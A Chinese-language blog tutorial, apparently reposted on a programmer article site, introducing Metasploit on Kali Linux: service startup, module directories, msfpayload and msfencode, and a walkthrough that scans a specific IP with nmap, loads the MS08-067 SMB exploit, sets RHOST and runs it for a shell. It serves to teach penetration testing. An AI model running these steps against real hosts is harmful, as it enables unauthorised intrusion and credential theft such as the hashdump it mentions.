欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

kali 漏洞利用metasploit

程序员文章站 2022-05-18 22:14:22
...


Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。

1.启动服务:

在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录
kali 漏洞利用metasploit
2.路径介绍

kali中,msf的路径为/usr/share/metasploit-framework
kali 漏洞利用metasploit
比如modules中,是我们在msf中经常会利用到的一些工具
kali 漏洞利用metasploit
auxiliary:辅助模块

encoders:供msfencode编码工具使用,具体可使用msfencode -l

exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录。

payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump,arp_scanner就在这里。

3.基本命令

msfpayload:用来生成payload或者shellcode

搜索的时候可以用msfpayload -l |grep “windows”这样的命令查询。

-o 选项可以列出payload所需的参数

msfencode:

msf中的编码器,现在常用msfpayload与它编码避免exploit的坏字符串(比如00,会起到隔断作用)

msfconsole:

开启metasploit的console

4.测试示例:发现漏洞,搜索exploit,先用nmap扫描主机,扫描命令

nmap -sS -sV -O --script=smb-check-vulns.nse -n 222.28.136.22
  • 1
  • 1

kali 漏洞利用metasploit
可以看到,其中含有漏洞MS08-067

在console中搜索一下,可以看到下面的界面
kali 漏洞利用metasploit
然后就use其中一个版本

use exploit/windows/smb/ms08_067_netapi
  • 1
kali 漏洞利用metasploit
  • 1

查看一些参数
kali 漏洞利用metasploit
可以看到RHOST(远程IP地址)还没有设置,这时我们就使用下面的命令来设置

set RHOST 222.28.136.22 
  • 1
  • 1

选择payload
kali 漏洞利用metasploit
设置好之后,就可以对目标进行攻击测试,输入exploit即可,如果成功,就会返回一个shell